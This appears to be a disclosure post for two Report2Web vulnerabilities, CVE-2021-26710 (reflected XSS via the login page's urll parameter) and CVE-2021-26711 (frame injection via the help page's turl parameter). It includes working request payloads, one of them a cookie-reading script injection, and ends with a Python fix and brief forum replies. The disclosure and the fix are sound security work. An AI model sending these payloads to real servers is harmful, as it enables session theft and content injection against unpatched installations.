Redwood Report2Web CVE-2021-26710 and CVE-2021-26711

Redwood Report2Web v4.3.4.5 and v4.5.3 are vulnerable to XSS. v4.3.4.5 is also vulnerable to frame injection. These are the vulnerable versions to the best of my knowledge. Both issues seem fixed after v4.6.0.

Report2Web Login Panel XSS [CVE-2021-26710]

The value of the urll parameter is getting reflected without any sanitization, allowing a remote attacker to inject JavaScript code into the victim’s browser by using a simple payload "><script>alert(1)</script>

Request:

GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=F291E04B316ED2DF72623ACEA8D952CA; r2wctg=3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<form name="form" action="signIn.do" method="post" onsubmit="return handleSubmit(this);">
 <input type="hidden" name="id" value="" />
 <input type="hidden" name="language" value="en" />
 <input type="hidden" name="urll" value=""><script>alert(document.cookie)</script>" />
 
<div class="outer">
...

Report2Web Online Help Frame Injection [CVE-2021-26711]

The turl parameter takes a local path as input and displays its content inside a frame, e.g. ?turl=/local/path/doc.html. Although LFI isn’t possible, you can bypass the protection by using \/hostname.tld, which the browser translates to //hostname.tld and then to https://hostname.tld, loading an external resource inside the frame and leading to vulnerabilities like XSS and content injection.

Request:

GET /r2w/help/Online_Help/NetHelp/default.htm?turl=\/example.com HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<frame id="right" name="right" title="Topic text" src="\/example.com">
...
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26711

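A server-side fix covering both findings, as an added Python example (not Redwood's code): turl values are confined to a path under the help tree, rejecting the backslash, network-path and scheme forms the browser would resolve off-site, and reflected values are attribute-escaped before they reach the form. HELP_ROOT is taken from the request path above; the fallback topic name is a placeholder.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

HELP_ROOT = "/r2w/help/Online_Help/NetHelp/"   # help tree seen in the request above
DEFAULT_TOPIC = "welcome.htm"                   # placeholder fallback topic (assumed)


def escape_attr(value: str) -> str:
    """Escape user input for a double-quoted HTML attribute, so the
    '"><script>' break-out becomes inert '&quot;&gt;&lt;script&gt;'."""
    return html.escape(value, quote=True)


def resolve_help_path(turl: str) -> Optional[str]:
    """Return a help-local path for a turl value, or None if the value could
    make the frame load anything that is not a file under HELP_ROOT."""
    # Browsers drop tab/CR/LF while parsing URLs, so '/\t/host' would turn
    # into '//host' client-side; reject any control character outright.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in turl):
        return None
    # Special-scheme URLs treat '\' as '/', which is exactly how
    # '\/example.com' becomes the network-path reference '//example.com'.
    normalized = turl.replace("\\", "/")
    parts = urlsplit(normalized)
    # A scheme (https:, javascript:, data:) or an authority means off-site;
    # '///host' is also collapsed to '//host' by browsers, hence the prefix check.
    if parts.scheme or parts.netloc or normalized.startswith("//"):
        return None
    segments = [s for s in parts.path.split("/") if s not in ("", ".")]
    if not segments or ".." in segments:        # empty or traversal
        return None
    return HELP_ROOT + "/".join(segments)


def render_topic_frame(turl: str) -> str:
    """Emit the help page's frame tag with a validated, escaped src."""
    src = resolve_help_path(turl) or HELP_ROOT + DEFAULT_TOPIC
    return f'<frame id="right" name="right" title="Topic text" src="{escape_attr(src)}">'


def render_urll_field(urll: str) -> str:
    """Emit the login form's hidden field with the reflected value escaped."""
    return f'<input type="hidden" name="urll" value="{escape_attr(urll)}" />'
```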

two CVEs in the bag :ok_hand: :+1:


Thanks messede,
will definitely try to master it.